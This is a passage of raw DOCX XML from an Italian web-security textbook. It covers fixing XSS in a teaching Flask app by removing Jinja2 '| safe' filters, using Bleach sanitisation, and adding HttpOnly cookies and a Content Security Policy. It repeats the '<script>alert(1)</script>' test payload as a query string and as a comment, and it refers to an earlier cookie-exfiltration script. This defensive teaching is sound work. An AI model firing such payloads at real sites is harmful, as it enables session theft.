              <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(eseguito)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(mostrato come testo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Mario "il fenomeno"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Mario "il fenomeno"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Mario &amp;quot;il fenomeno&amp;quot;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Visivamente nella pagina sono identici (il browser rende le entità come i caratteri originali nel display),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ma per il parser HTML sono profondamente diversi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: le entità non vengono interpretate come tag, sono solo testo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="361" w:name="risolviamo-bancapiccola-mini"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Risolviamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sostituisci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ q | safe }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ q }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cerca()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Risultati per "{{ q }}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">h2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E sostituisci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ c[1] | safe }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ c[1] }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">prodotto()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ c[0] }}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: {{ c[1] }}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia. Riprova gli attacchi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?q=&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ vedi il testo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come testo, niente alert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1135"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Posta un commento con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;...&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ il commento viene mostrato letteralmente, lo script non è eseguito</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Hai chiuso XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rimuovendo due</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="361"/>
    <w:bookmarkStart w:id="362" w:name="la-regola-per-jinja2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La regola per Jinja2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Jinja2 / Flask:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">{{ variabile }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ escape automatico,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">sicuro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">{{ variabile | safe }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ escape disabilitato,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pericoloso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">{% raw %}...{% endraw %}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ blocco non interpretato, evita confusione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Usa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">quando il contenuto è HTML che generi tu (codice trusted), mai per contenuto utente. Se ti viene la tentazione di usare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su un input utente per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permettere un po’ di formattazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(grassetto, link), non farlo: usa una libreria di sanitizzazione HTML come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Bleach</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bleach</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">testo_pulito </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bleach.clean(commento, tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"i"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"a"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], attributes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"a"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"href"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bleach permette solo i tag che autorizzi, rimuove gli altri.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="362"/>
    <w:bookmarkEnd w:id="363"/>
    <w:bookmarkStart w:id="367" w:name="difese-stratificate"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="547" w:name="sec_8_8"/>
      <w:r>
        <w:t xml:space="preserve">8.8 Difese stratificate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’escape dell’output è la difesa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">principale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Per la difesa in profondità (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), aggiungi questi tre strati.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="364" w:name="strato-1-cookie-httponly"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strato 1 — Cookie HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per impedire che JavaScript legga i cookie di sessione (e quindi possa rubarli con XSS), si imposta il flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sul cookie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Flask: il cookie di sessione ha HttpOnly di default</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">app.config[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SESSION_COOKIE_HTTPONLY"</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default</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">app.config[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SESSION_COOKIE_SECURE"</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solo HTTPS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">app.config[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SESSION_COOKIE_SAMESITE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Lax"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># protezione CSRF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HttpOnly = true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// → "" — JavaScript non vede più il cookie di sessione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo script di esfiltrazione del </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_8_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§8.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> non può più rubare il cookie.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anche se XSS esiste, l’impatto è ridotto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="364"/>
    <w:bookmarkStart w:id="365" w:name="strato-2-content-security-policy-csp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strato 2 — Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Content Security Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è un header HTTP che dice al browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quali script può eseguire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sulla pagina. Una CSP rigida blocca l’esecuzione di script inline (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;...&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) accettando solo script da URL specifici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio minimo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.after_request</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> aggiungi_csp(response):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    response.headers[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Content-Security-Policy"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"default-src 'self'; "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"script-src 'self'; "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"object-src 'none'; "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
